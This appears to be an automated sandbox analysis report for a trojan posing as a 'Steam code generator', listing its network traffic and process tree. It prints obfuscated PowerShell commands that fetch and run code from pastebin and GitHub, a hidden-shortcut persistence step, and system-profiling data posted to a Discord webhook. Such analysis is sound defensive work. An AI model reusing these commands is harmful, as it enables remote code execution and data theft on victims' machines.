                                                                      2024-10-15 13:59:54 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                      Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449746172.67.19.244437248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 14:00:01 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: pastebin.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 14:00:01 UTC397INHTTP/1.1 200 OK
                                                                      Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-frame-options: DENY
                                                                      x-content-type-options: nosniff
                                                                      x-xss-protection: 1;mode=block
                                                                      cache-control: public, max-age=1801
                                                                      CF-Cache-Status: HIT
                                                                      Age: 451
                                                                      Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30553fbc872cb0-DFW
                                                                      2024-10-15 14:00:01 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                      Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                      2024-10-15 14:00:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.449748185.199.109.1334437248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 14:00:02 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: raw.githubusercontent.com
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 14:00:03 UTC900INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 7508
                                                                      Cache-Control: max-age=300
                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: deny
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                      Accept-Ranges: bytes
                                                                      Date: Tue, 15 Oct 2024 14:00:03 GMT
                                                                      Via: 1.1 varnish
                                                                      X-Served-By: cache-dfw-kdfw8210077-DFW
                                                                      X-Cache: HIT
                                                                      X-Cache-Hits: 1
                                                                      X-Timer: S1729000803.008550,VS0,VE1
                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                      Access-Control-Allow-Origin: *
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      X-Fastly-Request-ID: 5fb2841b8dc086f1158375955679e48c06408ce1
                                                                      Expires: Tue, 15 Oct 2024 14:05:03 GMT
                                                                      Source-Age: 8
                                                                      2024-10-15 14:00:03 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                      Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                      2024-10-15 14:00:03 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                      Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                      2024-10-15 14:00:03 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                      Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                      2024-10-15 14:00:03 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                      Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                      2024-10-15 14:00:03 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                      Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                      2024-10-15 14:00:03 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                      Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.449749162.159.138.2324435660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 14:00:08 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Content-Type: application/json
                                                                      Host: discord.com
                                                                      Content-Length: 298
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 14:00:08 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 6a 6f 6e 65 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 5f 35 56 44 47 55 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                      Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** Y_5VDGUM\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                      2024-10-15 14:00:08 UTC1255INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 15 Oct 2024 14:00:08 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 45
                                                                      Connection: close
                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                      x-ratelimit-limit: 5
                                                                      x-ratelimit-remaining: 4
                                                                      x-ratelimit-reset: 1729000809
                                                                      x-ratelimit-reset-after: 1
                                                                      via: 1.1 google
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4y9gj4sWdq%2By0jEQwDG6uSzZLfzSQLJs6deNAx5PdrOB87WoZAU0lF29ALF%2Fb28JQcPnLPKT4f6HKjVVNXTMsTjMVSKMCgEkjbQ2y%2BU7MHWSvJH7VYbbjIKrGoWV"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: __cfruid=898bd1d6d1178ff7245a151efa26800a53bbff85-1729000808; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                      Set-Cookie: _cfuvid=shRMVpCMnQJcd9oFhWDOKkHJPOxlMBHoMx_v_HmOv2k-1729000808433-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30556bdcc53455-DFW
                                                                      2024-10-15 14:00:08 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                      Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.449763162.159.138.2324437248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 14:00:16 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Content-Type: application/json
                                                                      Host: discord.com
                                                                      Content-Length: 298
                                                                      Connection: Keep-Alive
                                                                      2024-10-15 14:00:16 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 6a 6f 6e 65 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 5f 35 56 44 47 55 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                      Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** Y_5VDGUM\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                      2024-10-15 14:00:16 UTC1257INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 15 Oct 2024 14:00:16 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 45
                                                                      Connection: close
                                                                      Cache-Control: public, max-age=3600, s-maxage=3600
                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                      x-ratelimit-limit: 5
                                                                      x-ratelimit-remaining: 4
                                                                      x-ratelimit-reset: 1729000817
                                                                      x-ratelimit-reset-after: 1
                                                                      via: 1.1 google
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jjzbRDm%2B2SlpjKVS72i7IPSdiTMsScsmN0thaBYTgtj6qqodAYw7O7hfydAkKesLwdKFKeexRvA9ISH6R%2BRd4gD6CE7yn1CKxr%2BAdg8y0Q8Vn6c%2B5D5xu69Z3mg"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: __cfruid=e316ba9d782cc8a8d64ff500cb6e6c4c929f0dd5-1729000816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                      Set-Cookie: _cfuvid=6UMiXvDrHMMRL.7XfRyxsGJQ1gU6UcIilxJInvvqYJg-1729000816294-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Server: cloudflare
                                                                      CF-RAY: 8d30559cfb90e867-DFW
                                                                      2024-10-15 14:00:16 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                      Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:09:59:22
                                                                      Start date:15/10/2024
                                                                      Path:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\steamcodegenerator.exe"
                                                                      Imagebase:0x7ff663540000
                                                                      File size:258'048 bytes
                                                                      MD5 hash:D4F1751389516A3DFAC98551142CB153
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3629903861.0000022AF4D00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:1
                                                                      Start time:09:59:22
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:09:59:27
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell.exe -command start powershell -windowstyle h -args {sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)}
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:09:59:30
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:4
                                                                      Start time:09:59:30
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:8
                                                                      Start time:09:59:48
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\attrib.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                      Imagebase:0xe30000
                                                                      File size:23'040 bytes
                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:09:59:49
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\forfiles.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                      Imagebase:0x7ff7729f0000
                                                                      File size:52'224 bytes
                                                                      MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:09:59:49
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:11
                                                                      Start time:09:59:49
                                                                      Start date:15/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                      Imagebase:0x7ff788560000
